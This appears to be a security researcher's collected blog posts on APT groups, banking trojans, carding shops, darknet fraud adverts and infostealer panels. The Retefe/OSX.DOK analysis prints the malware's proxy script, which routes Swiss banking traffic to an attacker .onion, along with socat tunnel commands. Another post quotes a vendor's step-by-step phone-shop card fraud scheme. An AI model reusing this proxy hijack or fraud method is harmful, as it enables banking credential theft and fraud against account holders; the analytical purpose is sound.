Russia v Ukraine : A primer for the uninitiated

Russian intervention in the Ukraine, be it military or 'cyber', historically has been something of a strategic playground, whilst other attacks observed are more 'noisy' - or disruptive, the ongoing incidents which can be, and will be attributed to Russia. If like me, you're a scholar at the aspects of cyber incidents particularly when it comes to Russia v Ukraine which experts will quickly identify and theorize are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested  and recommended the following

  1. The 'ultimate' guide, in my humble opinion, is here Russia v Ukraine  Kenneth Greers
  2.  APT28 or depending on the vendor
    Pawn Storm,
    Sofacy Group,
    Sednit,
    STRONTIUM,
    Tsar Team,
    Threat Group-4127,
    Grizzly Steppe (when combined with Cozy Bear) The important part to note here is that APT28 is widely believed to be GRU, and GRU are explained in detail here 
  3. APT29 or Cozy Bear, again depending on the vendor may be called any of the  following Office Monkeys, 
    CozyCar, 
    The Dukes, 
    CozyDuke, 
    Grizzly Steppe (when combined with Fancy Bear)

This is the best infographic I have seen explained the process of APT28/29 activity.

APT28_APT29_Techniques_-_Spearphising.png

 

There are a breathless number of analysts capable of dissecting the incidents that occur within the Ukraine borders and often more are bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. My experience of working with some extremely talented analysts both in the Government and at F500 who actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M.Lee explicitly called out this type of behaviour and asked 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions, I look to people like Robert M. Lee for measured and sensible analysis, as should you - if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US. The election, something which those not directly involved in intelligence, be it cyber or policy will still be closely unpicking. I recommend the following content for insights how the 'fake news' - and i still can't say that phrase with a straight face, helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying themes in that disinformation played a significant part in the U.S Election you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to place extremely close attention to it.

Cambridge Analytica  

https://medium.com/join-scout/the-rise-of-the-weaponized-ai-propaganda-machine-86dac61668b

tl:dr - big data manipulated everyone.

The Plot to Hack America by Malcom Nance

https://en.wikipedia.org/wiki/The_Plot_to_Hack_America

tl:dr - Coincidence takes a lot of hard work, Also - Russia sought to manipulate the election by way of a number methods including social media propaganda, hacking of DNC emails and strategically placed adverts

Is Ukraine the Test Lab for Russian - Wired

https://www.wired.com/story/russian-hackers-attack-ukraine/

tl:dr - Attackers gained access to critical systems, excellent analysis from Dragos here 

 

Retefe v OSX.DOK Part 2

I last month had some time to look at the latest iteration of OSX.DOK/Retefe for macOS and thanks to Jaromir from Avast and the excellent VB presentation I can conclude they are almost identical, the reasons for this include the following:

From the presentation at VB Avast noted

The below is collection of the some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates presumably either stolen which enable them to bypass the macOS security feature known as Gatekeeper, it's not clear how these accounts are being used or if they are using pseudonyms to prevent suspicion below are some samples. You can use the codesign command with relevant parameters to identify the signed status of the app bundle 

Masquerading as trusteer.app

 

All macOS apps need a manifest file known as a info.plist file which includes the MachineOSBuild as a tag, which in this case was 13F1911 which is commonly known as OSX Mavericks, which means it was likely a Virtual Machine or the developer has an older OS 

The samples are UPX packed 

Screen Shot 2017-05-17 at 22.57.44.png

I've just uploaded one single sample for researchers to analyse, however, Apple is actively investigating the misuse of these certificates.

https://www.virustotal.com/en/file/80634e7b69f77825e5316e046c5a08c70b9950123845ef9a54a1abb9d8acb9a9/analysis/1495058845/

  • 11/05 notify Apple Security
  • 13/05 confirmed incident with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods that i had seen used by Retefe, having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks. The United Kingdom, and France but a real target in my own experience has been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint here so slightly confusing.

The part of Retefe which struck me as similar included the proxy .JS file for the trojan to identify the range of banking sites it wants to intercept.

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

from the OSX version which include the following LaunchAgents

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe       OSX/Dok

Root Certificate    Root Certificate

Proxy hijacking   Proxy hijacking

paoyu7gub72lykuk.onion paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of media for a while, and the revenue they generate are clearly attractive to criminals and to law enforcement as demonstrated recently both here and here.

 

 

 

 

 

#MongoDB - A dumpster fire of cry laughter

Thankfully, a lot of interest is on MongoDB over the past few weeks. It's not a new problem, however, the more people reporting on it the more C-level people will ask the question of 'where is my MongoDB?'

John Matherly originally wrote about this in 2015 This entry has since been resurrected and will no doubt be again resurrected in another 12 months. A significant media outlet are taking note in this extortion practice and for me, whilst painful for the victims this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.
— https://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Sacrifice_the_plum_tree_to_preserve_the_peach_tree

So, with this in mind. Let's take a look at the data currently available as of 05/01/17. Data will be redacted, I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  •  Job Site

IP address, location, current job title

  • Health data 

Passwords, DOB, Weight, Height, Phone number, Diabetic status, last login IP


  • An android .APK backend for tracking users of a Satellite app

Some further data included, Network type, IE: 3G, 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under most .ru domains or .su offer a significant amount of diverse fraud options, ranging from simple carding fraud from dumps or CVV dumps. I had identified, ' The Money Team' by way of their preference for offering what is known as pink slips.

 

Pink slips are known better as those used in financial dealings, and in particular Insurance firms. Those fraudulent forms used here are targeting the following

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

Offering a substantial amount of documentation via a DNM for the following prices, which are competitively priced based upon a sliding scale depending on amount purchased. IE: more slips, the cost goes down.

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample, a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out, and diversification of a criminal enterprise is key to success and the soon to be launched tmtdocs.com site offers a direct link to their trades

The site unsurprisingly sits behind CloudFlare 

I will be paying close attention to what other services pop up from TMT.

 

2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time, the amount of breaches, attacks and disclosures have been almost non stop and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye for a number of reasons.


  • HSBC Bank attacks - January 
  • Operation Dust Storm - Feburary
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP Bruteforcing - May
  • Democratic Party Hack - June and of course the disappearance of Angler around the same time and NATO recognises Cyber as a '5th domain of warfare' 
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDOS attack - September and the Congressional oversight releases the report on the OPM breach 
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December Bonus video footage of the arrest here  

No real surprises for those in the trenches of security, I've missed out some of the more 'media' friendly stories as cyber became front page news this year, with every DDOS and breach impacting those who have zero idea how the incident will have occurred.  Typically cloudy responses from the organisations affected do not help the affected, or more importantly the victims.  

What are companies doing to ensure this doesn't happen to them? The basics, the advanced intelligence led security endeavours to look for the potential attack vectors and methods being used elsewhere, and deriving the intelligence from them, but the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as i call them the BBC factor. I am a big fan of @thegruqg for one his clarity in tone for security along with his razor wit is good to see in security, he is a poster boy for security snark and backs it up with proof.

The ultimate being this tweet

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”
— https://twitter.com/thegrugq/status/658991205816995840

 

And he is so right, Tesco may have been hacked by a vulnerability in the back office system, or an insider threat offering access to his terminal for transactional access, but the fact remains few of the breaches above where ' sophisticated'

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DOS attacks - hardcoded passwords and insecure protocols in CCTV, and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.

 

2017 predictions are here, and i'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2.MD5 passwords
3.Companies threatening security researchers for disclosures.
— https://twitter.com/Bry_Campbell/status/810091303417610240

#Dridex has big ambitions..

Dridex, Dridex. The bane of so many people's lives. My included. Has been 'quiet', i made a post in the hope it had gone away. It had not. It has returned with a couple of new Botnet ID's, 144 and another 1024 which i am still working on.

Includes a list of interesting targets.

The interesting part is the 'sgoldtrakpc' part, which leads to this conclusion:

FPS GOLD provides core processing and eBanking software for community banks across the United States. We offer the solution to all of your banking challenges—including ever-changing regulations and security threats. And the FPS GOLD solution is fully integrated, saving you time and money.
— http://www.fps-gold.com/about.aspx

From the sample Matt posted and the one i was analysing, included a comprehensive list of commercial banking applications, and also an improved list of enterprise applications. List is here see the comments for the full list.

Samples used in analysis here & here

Incidentally, Dridex has historically been delivered by an macro enabled document, Microsoft recently backported a good solution to blocking these from downloading malicious payloads using this - https://support.microsoft.com/en-us/kb/3115427 but it was exclusive to Office 2016. Thankfully, it's now in Office 2013! Please install this patch ASAP.

Going shopping on the Dark web

I've recently learnt the impact of what, we the, 'entrenched' take as the norm. Case in point

 

To the vast majority of security, this is not 'news', but that doesn't take away the fact that this is equally as important to those affected. Graham Cluley also has some thoughts on it here

But what hackers frequently do these days is use a technique known as “credential stuffing” - taking the information they have stolen from one site, using it to log into another site, and then using any information they gather on any accounts they manage to access to gather additional personal information which could be used for fraud.

— https://www.grahamcluley.com/2016/07/yes-data-breach-really-fault/

So with that in mind, i thought i would demonstrate what is available on one of the more popular 'Darknet Markets' - A primer here on that area here

Firstly, some markets are usually quite accessible.  A good list here There is an exception to the rule for some markets that do require a deposit, or a cosign from someone legitimate enough to 'vouch' for you.

What can i buy?

Lots, you can can usually identify the interesting things in much the same way as most auction sites do, by way of feedback. A quick run down on some of the items, physical and virtual and the services associated with them are below

  • Banking

I wrote about muling here but the level of services used in between these are not limited to muling, there are 

  • Carding Services - Hotel fraud, such as booking services and ticketmaster gift cards.

Screen Shot 2016-07-26 at 21.23.54.png

Damaging to the brand associated with the theft & fraud.

  • Bank Account transfers - Often taken from compromised devices or those botnet owned.


  • British Airways accounts - Often from RATTED machines


  • Weapons - Yes, you can order a weapon from the internet


Personal information is a commodity in itself and arguable the most valuable, however its value is dependant on those who can best use it to gain most profit, its for sale here too as mentioned in relation to the original o2 article.

The insider threat is something which is gaining a lot of attention and will only grow as a exponential threat to businesses who do not understand the concept.

This advert offers an insider inside all of the UK's most popular Phone stores


Boggalertz - Best Seller in the world, just wait and see.

Please read this carefully************

To take advantage of these profiles you will need the following
1) An insider in any phone shop
2) A credit or debit card, which you know the pin and registered address for
3) there must be at least £10 on the card
4) This is for UK only

Heres how it works.......
* You send me the door number and the postcode of the registered card, EXCLUDING the LAST 2 LETTERS. ( SO I DON’T EVER KNOW THE ACTUAL ADDRESS)
* I will send you back a profile which will pass for mobile phones in ANY phone shop, providing you use the correct card
*You go to your insider and place orders for as many handsets as you can get your grubby little mitts on
*You leave me nice feedback and tell the world that BOGGALERTZ is the worlds best seller!

—————————————————————————————
You will need an insider because of 2 reasons
1) the DOB may not match what you or your striker looks like
2) the name will not match the name on the card (which I will never know)


Again, to the majority of the security community this is not a 'new' concept. However encouraging mainstream media to take an active interest in this will highlight its availability and ensure that those at risk are educated more and understand the risks.

 

 

 

Tools of the trade: An intro.

I received an email from someone just starting out in security as a chosen career path and had bought a laptop to use purely for research. I don't particularly advocate any one laptop over another, i use a *Macbook for two reasons

1. Resale value

2. The screen is amazing, and my eyesight is getting progressively worse.

I outputted a list of my tools and was surprised at just how much i had customised my device.

  • KnockKnock from Patrick Wardle, along with a lot of other tools are available here "KnockKnock... Who's There?" See what's persistently installed on your Mac. KnockKnock uncovers persistently installed software in order to generically reveal malware.
  • Little Snitch - Essentially a firewall, but offers usability.
  • Hopper - Disassembler for x86/x64 RE - Not free.
  • Radare - Another disassembler, my personal preference.
  • Brew - It's amazing OSX comes without half these tools, but you'll quickly realised you need them.
  • Shodan command line  - As above, really is part of everything i do.
  • Olevba - Excellent parsing for OLE files, usually MSOffice.

As an addendum, there is an brilliant 'hardening guide' for OSX here


N O T E : this is for beginners, as a more seasoned security researcher you're probably used to seeing these tools and probably shouldn't be reading this.

 

*Other excellent Laptops are available

 

 

 

Inside an international Carding shop

There is a world wide trade in stolen, or compromised credit cards which often end up in the hands of a few criminals who instead of attempting to spend the cash will choose to sell the content to those who can better 'cash out' and move the compromised content into account(s) that can essentially launder the cash. Muling and laundering reports here and here from Europol


Support manager shop (English) Please contact : ICQ ID : 684523892Email : [email protected] Yahoo : Chim_ThaiLan

The ICQ number 684523892 is associated a large number of results all associated with the trading of stolen/compromised credit card details. One such shop offers a significant amount of coverage including the US, China & EU

There are two types of cards referred to as 101 and 201

201 = Larger limits and no regional restrictions but requires chip verification

101 = Restricted limits (the preferred for criminals and those learning the carding game) and not chipped.

The rough translation of 'Chim_Thái_Lan' is 'Birds Of Thailand' which could be a reference to the location of the carding operation in terms of Asia, the shop offers assistance both in Thai & English as well working between the hours of BST and +6 Thai time.  When i asked for the rates and promised on purchasing i was faced with the following :

Thank u for interest!! rates below and promise value (:

? - DUMPS 101 Track1+Track2+PIN.
? - DUMPS 201 Track1+Track2+Track3+PIN.
? - Daily update.
? - Fast automatic payment methods
? - Replace lost/stolen/hold/card error/call
? - Replace if the card balance is less than $1,000
? - Balance > 1,000 - 100,000 EUR/USD
? - Lowest prices at a stuff of such quality.
? - After purchase you will have 3 days to check
? - Refunds
? - 100% GUARANTEE WORK
? - Support 24/7

 

Not sure about doing business with these guys just yet, i'll consider my options.

Patchwork & The Dropping Elephant APT

Good work from Gadi and the team at Cymmetria & Kaspersky -  Cymmetria report is here , Kaspersky here 

What struck me as odd and reminded me of some of the work i looked at in May was this line in the Kaspersky analysis:

it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands.
— https://securelist.com/blog/research/75328/the-dropping-elephant-actor/

This particular comment struck me because in early may i was analysing some malicious .pps documents i had received and identified a number of CVE's being used in them, they contained material related to the Government projects and political interests in SE Asia.

Example metadata from .pps leveraging CVE's

I was struggling to identify what type of campaign this was, when i identified some of the C2 commands were being stored in blog comments on legitimate web sites although they were completely unrelated to any political activity.



There is a lot of security research available in the political unrest of SE Asia, South China Sea. A lot of the content available to research has been laid by FireEye  the ongoing territorial disputes are being fought with a very competitive cyber theme.

Welcome back #Dridex

My most recent blog indicated we would see the back of Dridex  & Locky, in hindsight it was a bit hopeful. P2P botnets Do not die the very principle they are built on offers a level of persistence that makes it near on possible to remove.

It has 'returned' - hat tip to @malwaretech who has significant fingers in pies with Necurs and can identify a lot of what Dridex is doing.  I'm time limited in terms of RE at the moment and the changes in Dridex has shown, thankfully they are being identified by Matt Mesa at Proofpoint


What i have identified as a result of some recent changes is the OS fingerprinting which is new( to me at least to me) Dridex is actively identifying the OS running on the host


So, the question to me , why is Dridex looking to fingerprint the OS? I observed some interesting checks in the macro too including the number of documents opened previously ( Attempted Sandbox evasion i assume) but this is easily bypassed.

Goodbye #Dridex, good riddance #Locky

The Past

We will no doubt shortly see some official word on the 'takedown' of Dridex and/or Locky, it has been widely reported that the lack of daily spam campaigns indicates its disappearance is linked to the FSB operation. Its widely known that the FSB only get involved in cyber criminal activity when there is significant international pressure to investigate. 

It's difficult not to draw logical conclusions on the timings of the two operations and subsequent disappearance of Dridex/Locky but its unlikely that Russia would be directly involved in a 'takedown' operation of a significant botnet which was responsible for the theft of money from banking institutions.

During the period from mid-2015 to the present day, 18 targeted attacks have been recorded across the country at bank customers’ automated workstations. The damage caused has exceeded 3 billion rubles. The police have prevented potential damage in the amount of 2 billion 273 million rubles.
— https://xn--80agyg.xn--b1aew.xn--p1ai/news/item/7894434/

FSB & MIA worked with Sberbank to conduct this operation and the reports from Russian intelligence indicate around  2.2 billion rubles where lost between October 2015 to March 2016 which ironically is the same time of the Smilex arrest who at the time was in Cyprus, originally from Moldova.

The Present

  • Vawtrak/Hancitor/H1N1
  • Vawtrak = Banking Trojan AKA Neverquest
  • Hancitor = Dropper, usually by a Macro 
  • H1N1 = Loader, with UAC bypass  (With some additional checks for GetCurrentProcess, and a nice crash) - Thanks to the genius' on KernelMode

Identifying Hancitor was done by post infection in my lab -  Thanks to Matt as ever.



 

Really great overview here from Proofpoint and a sample here 

 

 

#Powershell - The enemy you are already losing the battle against

Powershell, and the attacks it is capable of is not a new concept. The number of publically available frameworks are growing exponentially. It's a trusted method of attack and one that is gaining more and more focus from those capable of leveraging its Power.

Why should you fear PowerShell leveraged attacks? Well, for a number of reasons:

  1. It's probably present on every single machine in your enterprise. 
  2. It's a native tool which is difficult to detect if used in an attack.
  3. It leaves very, very little in terms of forensic evidence on either endpoint, or if moving laterally across a network.
  4. Malware is already using it during attacks
  5. The namespaces it's capable of 'plugging' into are terrifying 

https://msdn.microsoft.com/en-us/library/system.directoryservices.activedirectory(v=vs.110).aspx

There are probably 10 more reasons to worry about Powershell, these are just ones i'm familiar with. 

I first begun using PowerShell to perform very mundane tasks that should be automated such as the creation of user accounts, the deletion of user accounts etc. I then found out that Microsoft was releasing a version of Windows which was a command line with no GUI. This effectively means you can manage it via command line and subsequently remotely. This did exist before, but the functionality used in R2 was far greater than it was.


No. There is nobody here.


Server Core, the version which i begun to use in place of the full blown GUI version was easy, i was able to configure Windows RM using sconfig. I then begun to use Powershell in a way which made me understand just how powerful it was. I'm no script ninja, i am able to write scripts which help me do work in a faster, more agile way. 

Then i discovered this Get-wmiobject i realised was able to use WMI classes which as far as i remember was the single most dangerous thing i'd seen on a network, barring physical access to a comms room. Why? Well, WMI is essentially a remote management framework, you can do the worst thing possible on an endpoint - Execute code.  I hope this sufficiently conveys the capability of it?

Further to this, a lot of very smart people are already doing fantastic work in this place. In no order whatsoever. I would recommend following, and keeping an eye on their work very closely.

  • Matt Graeber - https://twitter.com/mattifestation
  • Will - https://twitter.com/harmj0y
  • Sean Metcalf - https://twitter.com/PyroTek3
  • Chris Campbell ( Great surname by the way ) https://twitter.com/obscuresec

Some of the frameworks currently undergoing contined development

  • http://www.powershellempire.com/
  • https://github.com/PowerShellMafia/PowerSploit
  • https://github.com/samratashok/nishang

Sean presented probably the most important talk on Active Directory attacks in a very long time and thankfully the ability to detect them at Blackhat 2015 - Slides here i have watched this video more times than i remember. The stats included from this are from the DBR 2015



'' Its way to easy to get someone to someone to click on a link '' Sean Metcalf 2015

If you need to defend against these kinds of attacks, the work done by Sean is available here.

Recommended reading

  • https://www.nsa.gov/ia/_files/app/spotting_the_adversary_with_windows_event_log_monitoring.pdf
  • https://mva.microsoft.com/en-US/training-courses/using-powershell-for-active-directory-8397
  • https://technet.microsoft.com/en-gb/library/cc995228.aspx

Some very public breaches have contained links to the potential usage of these tools if you still needed convincing.



The hackers behind the attack on infidelity website Ashley Madison alerted staff to the breach by setting their laptops to play AC/DC song 'Thunderstruck'.

The following is a code snippet available from Powershell Empire..

import base64
from lib.common import helpers

class Module:

def __init__(self, mainMenu, params=[]):

self.info = {
'Name': 'Invoke-Thunderstruck',

'Author': ['@obscuresec'],

'Description': ("Play's a hidden version of AC/DC's Thunderstruck video while "
"maxing out a computer's volume."),

'Background' : True,

'OutputExtension' : None,

'NeedsAdmin' : False,

'OpsecSafe' : False,

'MinPSVersion' : '2',

'Comments': [
'https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot'
]
}

It may be completely unrelated, but it's an interesting thought to link the two together...

Thanks to all those named above for the work they are doing in this area.

 

 

 

Please add me to your #Linkedin sockpuppet network!

Linkedin has approximately 414m active users of which, a part are completely fake. This practise has been observed in the past with fake recruiters targeting researchers. 

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist who finds a lot of the details included here) using Linkedin as a new platform to perform attempted financial fraud.

A large number of screenshots shared with me are as a the result of a misconfigured Keybase panel, there is a well known bug in Keybase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate them. Palo Alto have listed a large number here

A percentage of determined sock puppets are using LinkedIn as a means at defrauding a significant number of business in following countries:

  • UAE
  • US
  • UK

Figures are created as a result of the companies targeted in the panel images

 

The sectors that are targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense it involves geographically displaced criminals to 'link up' to to be successful. The fraud is highly likely comitted from Nigeria (Thanks to @techhelplist again who helped ID the content and fraud gang) the concept is simple - Offering investment or seeking investment depending on the potential victim.

The belief that this  fraudulent operation is from Nigeria is because of the evidence provided, this included active Facebook content and helpful photographs of places of work, and friends associated with the gang.

This below image is taken from a panel which shows our 'guy' logged into a Linkedin profile, and a large number of messages all with the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job on supplying a large number of samples to various malware, iSpy came to my attention recently and the codebase is almost identical to KeyBase with both employing the same stealing functions. I will post a more detailed article on iSpy when i get time.

Reconnaissance message

We offer secured loand or funds to individuals and companies at low interest rates. we offer long and short terms loans or funding of any projects. Our firm has a recored a lot of breakthroughs in the provision of first-class financial services to our clients.
— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers, if you believe you've been approached by this gang, or have been part of the attempted fraud process please contact me, i can share a number of verified IOC's.

The below image is a cap from the /images/ directory which includes a conversation with the 'master' who shares the devices used to perform the initial reconnaissance. Pg.5 on this alludes to the hierarchy involved

In summary, this concept of attempted fraud by social networks should sufficiently deliver a message that nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy on 'scammers' operating out of Nigeria.  Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits
and keyloggers, such as email extractors, email notifiers, bulk
mailing providers, and VPN/proxy providers. The email extractors
help scammers scrape email addresses of potential targets from
various sites which are fed to bulk mailing applications. They use
proxy providers as a precaution when logging into their victims’
accounts to hide their IP addresses. They also use email notifiers
to monitor incoming emails.
— https://www2.fireeye.com/rs/848-DID-242/images/rpt_nigerian-scammers.pdf

Trust, but verify is a mantra that i preach. It's dissapointing that Linkedin does not have any method of formal verification for its users. There is no PGP or Keybase.io input required, even most DNM require some form of ID verification!

@thegrugq makes the point far more eloquently that i ever could. In short, the game of cyber security has changed, and the content in which you operate or call your working environment, is someone else's lunch.

Full slides here

'only crime on this host'

There is some interesting aspects to research, one is being able to understand and analyse how criminals operate. Another is seeing how other researchers operate. 

Recently there has been a number of incidents that have involved what has been described as 'white hackers', i don't have a term which sufficiently describes the work other than, 'interesting'.

Who IS the Batman?

Last month, i noted that someone had replaced the malicious content usually delivered by Dridex with Avira and a ' calling card'. The calling card gave information as the content on the compromised server, and the intelligence which i believe was to identify the original owner or the original compromiser of the site

I've again been collating the intel behind this  person, or team who are quickly compromising the hosts after its been compromised and listing the details relating to the original compromise.

Following up to now? Good!

Legit site --> compromised ---> compromised again and details posted to identify the original actor.

Recently, a recently compromised site on hxxp://www.wakeupforpeace.org.au/crimeware-server-readme.txt-> Freezepage link http://www.freezepage.com/1456771380KTQSEGLOJB

Has been 'done' by what could be same actors/team previously observed in the Dridex 'incident', i may well be wrong but the details are strikingly similar.

 

The site itself is a simple phisher, looking for PayPay/banking credentials and some really bad .php handles the theft.

If anything this should teach you

  1. Do not use your own name for email address if you're going to use to receive the proceeds of crime.
  2. Do not log into your phishing site from your residential address 
  3. Also, do not include your personal email address in the POST of a transaction of a HTTP request.

Thanks again to https://twitter.com/Techhelplistcom/

#KeyBase reloaded

KeyBase first came to my attention in mid 2015, a favoured tool of those with little technical capability, and those known as ' skidz'.  I first wrote about in July 2015, noting some of the basic capabilities here http://www.brycampbell.co.uk/new-blog/2015/7/14/keybase-malware

Palo Alto have recently produced excellent research together with IOC's which go in to great detail, you should read it. http://researchcenter.paloaltonetworks.com/2016/02/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/

In essence it steals sensitive credentials, here is some of the PHP used to steal the data:

 

 

A lot of thanks should go to the great work that @malwarehunterteam, @James_MHT and @Techhelplist are doing to promote the discovery and takedowns of these panels. I have privately and legally, observed some of the content that is being stolen by the criminals and it's extremely sensitive material.

Welcome to KeyBase

KeyBase, as mentioned is a infostealer, and the Palo Alto write up discusses its capabilities in much greater detail than i will.

KeyBase arrives by spoofed mails, often as disguised as office documents, or with double extensions, here is an example.

Cynomix relationship values

Hash & sample available here -  courtesy of Invincea

So, the research and analysis went on, the content became richer.Researchers in certain circles are critically aware of a known bug in KeyBase and further bugs add to the information being less than secure, this is highlighted in the Palo Alto article, and all information is secured was done so legally.

The comical aspect which prompted this post was the fact that KeyBase itself is not advanced, it is very noisy, it does not encrypt data in network communications, perimeter security will detect its patterns as it attempts to exfiltrate any sensitive information demonstrated by the image above with 'Window title' in the packet.

The panels themselves are usually not configured correctly, they are almost 'plug and play', and this is confirmed by the research done by Palo Alto, the screenshots below are all taken from a panel which was completely unsecured and available to view on the open web.

We quickly discovered that the 'miscreants' behind these panels had infected themselves, the reason for this is clear. The interesting screenshots including Facebook profiles, and messages between the gangs.

Screen Shot 2016-02-26 at 23.48.45.png

So, critically. You'll note i have not obscured any content. Joseph Ikems - we've extracted content which was captured from his own panel, or the friend he's discussing the 'problems with the panel' with.

However, it's probably more likely it was jeffjeff, as the panel was closely named to this in terms of domain registration. The reasons for this are shown in part by the content below.

We have email. So, we've managed, or should i say he has given us his email. The above screenshot shows the miscreant logged into a yahoo mail account under the name ' dixion.tony', lets assume its [email protected]

The most advanced threat intelligence platform in the world agrees, this is potentially our guy, he has history and people are complaining about being scammed.

This begun to get interesting as the exposed screenshots yielded more information, this time as the criminals begun to actively target industries, setting up fake domains and fake businesses in an attempt to extort legitimate businesses once they had been compromised.

A tab open 'Textile companies turkey'

The targets included in the spam campaigns had been crafted to appear from a fake company as shown below, 'Jinatrading LLC'

Jinatrading LLc

Looks to be having some 'issues'.

Website content

As the content begun to become more peculiar so did the screenshots captured from the panel. At one point Tony decided to log into Facebook.

Ehhh..Tony!

The total number of screenshots from Tony's own machines exceed 90, and the total of screenshots is over 200. Attempting to alert the victims proved fruitless sadly, a lot of them never responded. 

The lessons learned, and not published here are that the criminals behind this enterprise persisted to infect themselves with their own stealer, and fail to understand the technology they worked with, the details here are approximately 20% of what was extracted, including fake company registrations to appear legitimate.

An aggressive financial motive was clear, and some element of muling was involved. The screenshots below show searches for how to clear money or 'cash out'.

How do i hide my stolen money breh?

Detailed IOCs are available upon request, some of the artefacts are available to search via Hash and are listed on VT.

  1. https://www.virustotal.com/it/file/b900930b35d27208fd93f17a6c66ade96e6ecf9de4d6dc0c812b1dbca6746ff2/analysis/
